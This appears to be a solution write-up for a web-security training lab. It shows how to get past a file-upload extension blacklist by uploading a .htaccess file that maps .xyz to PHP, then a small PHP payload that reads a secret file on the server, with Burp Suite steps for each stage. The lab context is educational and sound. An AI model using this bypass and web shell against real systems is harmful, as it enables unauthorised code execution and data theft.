apt | [Solution]Web shell upload via extension blacklist bypass

[Solution]Web shell upload via extension blacklist bypass

To solve the lab we have to upload php file to view /home/carlos/secret

Approach to solve

apt | [Solution]Web shell upload via extension blacklist bypass

Description: In this lab we have to upload a php file but .php extension is blacklisted. So, we have to make changes in .htaccess file to upload our php

The php file we’ll be using is aa.php it contains

apt | [Solution]Web shell upload via extension blacklist bypass

Trying to upload a php file

As we try to upload file with .php extension we get an error that php files are not allowed.

apt | [Solution]Web shell upload via extension blacklist bypass
apt | [Solution]Web shell upload via extension blacklist bypass

Intercepting the request

Now try to intercept the request in BurpSuite and send it to repeater as we have to make changes on same request again and again

apt | [Solution]Web shell upload via extension blacklist bypass

Making .htaccess file to execute php

As file aa.php is not allowed. So the basic logic that we will use here to bypass is by making changes in .htaccess(use to change the configuration of website) and giving some random extension to the file lets say .xyz and when it get uploaded it is treated as .php.

To edit .htaccess file change file name to .htaccess from aa.php and change content type to text/plain as it is the most common use MIME content type.

apt | [Solution]Web shell upload via extension blacklist bypass
apt | [Solution]Web shell upload via extension blacklist bypass

And then change the content to AddType application/x-httpd-php .xyz with this now the server will treat .xyz extension as .php

apt | [Solution]Web shell upload via extension blacklist bypass

Send the request and you’ll get 200 OK response that the file .htaccess has been uploaded.

apt | [Solution]Web shell upload via extension blacklist bypass

As we have now configured server to treat .xyz as php so now in change filename to aa.xyz and file contents to

<?php echo file_get_contents('/home/carlos/secret'); ?> 

This will display the contents of file secret.

apt | [Solution]Web shell upload via extension blacklist bypass
apt | [Solution]Web shell upload via extension blacklist bypass

Now send the request you will get at 200 OK response that aa.xyz is uploaded.

apt | [Solution]Web shell upload via extension blacklist bypass

Opening the image file to execute code

Go back and open the image. This can be done by finding the address from the image is being served through inspect element.

apt | [Solution]Web shell upload via extension blacklist bypass

Easy way is to just open it in new tab!

apt | [Solution]Web shell upload via extension blacklist bypass
apt | [Solution]Web shell upload via extension blacklist bypass

Got the flag and submit it.